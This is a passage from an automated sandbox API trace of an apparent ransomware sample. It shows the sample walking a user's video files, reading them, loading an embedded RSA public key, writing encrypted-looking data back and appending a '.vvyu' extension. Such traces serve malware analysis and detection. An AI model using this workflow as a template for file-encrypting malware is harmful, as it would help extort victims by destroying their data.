hHeap=0x620000) returned 1 [0202.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35f0 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35c0 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3620 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3650 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0202.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0202.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0202.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0202.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0202.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0202.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0202.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0202.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0202.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0202.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0202.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e901a0 | out: hHeap=0x620000) returned 1 [0202.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0202.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0202.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0202.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0202.136] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xcd93, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xcd93, lpOverlapped=0x0) returned 1 [0202.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0202.137] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xcd98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.137] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0202.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0202.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0202.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0202.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0202.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.138] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0202.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0202.138] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.139] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.139] CloseHandle (hObject=0x510) returned 1 [0202.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0202.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0202.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0202.141] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\A8eg.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\a8eg.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\A8eg.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\a8eg.mp4.vvyu")) returned 1 [0202.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.156] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.159] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61483690, ftCreationTime.dwHighDateTime=0x1d8a114, ftLastAccessTime.dwLowDateTime=0x2074acb0, ftLastAccessTime.dwHighDateTime=0x1d8a1a6, ftLastWriteTime.dwLowDateTime=0x2074acb0, ftLastWriteTime.dwHighDateTime=0x1d8a1a6, nFileSizeHigh=0x0, nFileSizeLow=0x89b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Asv9iqUaFA9rCWFze77.avi", cAlternateFileName="ASV9IQ~1.AVI")) returned 1 [0202.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.159] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Asv9iqUaFA9rCWFze77.avi") returned=".avi" [0202.159] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Asv9iqUaFA9rCWFze77.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\asv9iquafa9rcwfze77.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.165] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=35254) returned 1 [0202.165] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.169] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x8990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.169] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.171] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.171] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x89b6, lpOverlapped=0x0) returned 1 [0202.172] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.172] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.172] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.172] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.173] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0202.174] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.174] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.174] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.174] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.174] GetLastError () returned 0x0 [0202.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.174] GetLastError () returned 0x0 [0202.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0202.175] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.175] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0202.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.175] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.175] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.175] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x89c0) returned 0x2ea99b0 [0202.176] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e901a0 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e901e8 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35f0 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.178] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35f0 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea35d8 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0202.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3638 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0202.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.182] GetCurrentThreadId () returned 0x66c [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9048 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.183] GetCurrentThreadId () returned 0x66c [0202.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0202.183] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0202.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0202.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0202.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0202.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3638 [0202.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0202.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0202.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0202.185] RtlAllocateHeap (HeapHandle=0x620000, 